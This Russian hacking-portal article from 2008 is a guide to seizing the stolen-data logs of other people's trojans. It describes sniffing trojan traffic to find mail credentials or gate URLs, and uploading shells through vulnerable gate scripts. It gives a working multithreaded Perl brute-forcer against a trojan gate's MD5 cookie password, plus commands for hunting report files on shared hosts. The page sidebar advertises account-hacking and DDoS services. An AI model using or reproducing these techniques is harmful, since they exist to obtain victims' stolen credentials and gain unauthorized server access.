Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Как поиметь кучу отчётов с трояна | все способы захвата Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Как поиметь кучу отчётов с трояна | все способы захвата

27.06.2008

[Предисловие]

1. Мне в ПМ приходили, да и сейчас приходят лс с темами: "Как заливать шелл через гейт", "Как набрать отчётов", кто-то не понимает одного, кто-то другого. На написание повлиял большинством этот момент, писал я это для тех, кому это нужно. Те, кому это нах не надо и охота под**ать, просто забудьте о написанном здесь и извините, что у меня не получилось угодить вам - я собственно и не старался.

2. Здесь я собрал практически всё, о чём говорилось, о чём писалось по теме. Новые моменты писал сам. Даже если вы всё это знаете и о чём-то догадывались, то опять же пардон, возможно, мы мыслим однинакого, но я написал раньше, но ни в коем случае не сомневаюсь в ваших знаниях.


[Поле действий]

Свои как-то неприкольно... =) Поэтому вариантов.. три:
1) Склеенный (или в чистом виде) троян прямо попадает в ваши руки - это может быть шутка друзей, либо очередной кряк, кейген и т.п. Короче то, что прилетело вам в чистом виде.
2) Самим искать троян.

- Парсим ссылки с хак-ресурсов. Чтобы времени зря не терять, сливаем то, что выкладывают юзеры без репутации, с одним сообщением и то полугодовой давности. Либо с подписью "Не проверял".

- Смотрим (сколько под силу) новостных, не особо популярных порталов. Это может быть "супер-новый кибер софт", "кряки", всякая бурда, которая ещё выйти не должна, что-то вроде: "Кряк для NOD33 v.54". Сливаем самое подозрительное.

- Залезть в свой давным-давно забытый мыльник и просмотреть кучу спама, в поисках ссылки на "новую прогу" и т.д.

3) Читать дальше =)

Шансов довольно потереть руки на самом деле не так много, как кажется. Во многих случаях, попадаются бэкдоры или боты. Зацепить реально раскрученного пинча не так то просто. Но пусть вам повезло

[В чём суть]

Суть в том, чтобы добыть либо логин и пасс мыльника (smtp-протокол), либо адрес хоста и путь до гейта (http-протокол). В первом случае, пробуем получить доступ к мылу (ресиверу), во втором - пробуем залить шелл через уязвимость в гейте.

[Тырим]

1. Снифер. Суть в том, чтобы просмотрев лог снифера найти отправляемые пакеты, которые нас интересуют, а именно: содержащие логин/пасс от мыльника (smtp-протокол) или адрес хоста/путь до гейта (http-протокол).

Работу снифера на примере smtp описал fucker''ok. Смотрим здесь:
https://forum.antichat.ru/thread43114.html


Работу снифера на примере http я опишу сам.

Ничего опупенно нового я не открою. Мы так же будем смотреть содержимое отправленных нами пакетов.

Запускаем Wireshark:



Смотрим переданные нами пакеты:



Вот мы получили адрес хоста и путь до гейта. Осталось залить шелл (смотр. дальше)



2. Реверсинг

Даже не обладая навыками реверсера и дизассемблера, можно легко достать нужные нам данные. В этой статье Stalin'a всё описано как некуда подробно. Переписывать материал было бы просто глупо, да и попахивает плагиатом =) Здесь же можно почитать про заливку шелла.

Статья лежит здесь: http://exploit.in/forum/index.php?showtopic=9671


[Заливка шелла]

Пожалуй, основной момент, который влечёт за собой появление большинства вопросов.

1. Перед тем, как заливать шелл, настоятельно рекомендую вам зарегиться на том же хосте. Посмотрите в каком формате приходят отчёты. На некоторых хостингах, например, отстаёт время. =) Поэтому вы можете часами подбирать имя шелла, так и не понимая в чём дело.

2. Если вы всё предусмотрели, но шелл просто не получается залить по вполне не понятным причинам, наберите в адресной строке:

Код:
 
      

http://host/gate/gate.php?stat=1


Надпись "Фак нас нашли." будет означать (как вы все догадались), что юзается не "родной" гейт, а набирающий популярность гейт генома. Сплоит КРЫСА, увы, работать не будет. Поэтому и возникла необходимость в написании брутера =)

Код:
 
      

#!/usr/bin/perl -w

### (C) Один хороший человек ###

use threads;
use threads::shared;
use IO::Socket::INET;
use MD5;
use strict;

my @passwords : shared;
open(FILE, '<passwords.txt') || die $!;
@passwords = <FILE>;
close FILE;
chomp @passwords;
my $threads = 2; ####### количество потоков ##
my $host = 'host.ru'; ####### адрес хоста (БЕЗ пути до гейта) ##

my @thread;
for(0..$threads) { $thread[$_] = threads->create(\&brut); }
for(0..$threads) { $thread[$_]->join; }

sub brut {
my $context = new MD5;
while (@passwords) {
if ( my $socket = new IO::Socket::INET(PeerAddr => $host,PeerPort => 80,Proto => 'tcp') ) {
my $pass = shift(@passwords);
print $socket "GET /gate/gate.php?stat=1 HTTP/1.1\r\n".
"Host: $host\r\n".
"Range: bytes=0-63\r\n".
'Cookie: pass='.MD5->hexhash($pass)."\r\n".
"Connection: close\r\n\r\n";
while (<$socket>) {
print;
if (/Array/) {
open (GOOD, '>>good.txt');
print GOOD $pass;
close GOOD;
print "ГУД! $pass\x07\n";
exit
}
}
close $socket;
}
}
}



[На десерт]

Был удивлён, что про это ещё не писали.. Т.е. я ща спалю приват-фишку =) Идём на фрихост, смело регимся там, заливаем шелл на фтп. Ищем по всем ресурсам файлы с расширением .bin и .rep :

Код:
 
      

locate *.bin

Код:
 
      

locate *.rep


Смотрим, где лежат отчёты. Сливаем отчёты к себе на винт (прав должно хватать) - любуемся отчётами. =)

Второй момент. Если после реверса/снифферинга (в случае используемого пинчем) попался гейт генома, то это может быть альтернативной заменой брута. Если хватает прав на редактирование гейта, то просто выдираем пасс для формы авторизации:

Код:
      
vim /путь/target's_gate/target's_gate.php




заходим в ПУ гейта и сливаем отчёты. =) Если прав не хватает - брутим.


[Заключение]

Ну вот и всё, что я хотел поведать тебе, юный падаван.  Да пребудет с тобой сила! Удачи! =)

[Ссылки]

Сплоит КРЫСА
Снифер


Автор: Chuck 

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Взлом
Опубликовал: ModeuS
Просмотров: 14957
Проголосовало через SMS: 0
Ключевые слова: perl, php, exploit, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Неюзаные сканы в одни руки.
  • Mobile / Средства связи » Профессиональный софт для флуда мобильных/стационарных телеф
  • Разное / Законы » Взлом вконтакте, взлом инстаграм, взлом ок.ру, взлом вацап и
  • Разное / Предложения работы » Нужен способ заработка, майнинга
  • Разное / Куплю, приму в дар » Hack(Взлом) sapvice.hacknet@gmail.com - решение проблем по в
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом страниц: ВКонтакте, Одноклассники.
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}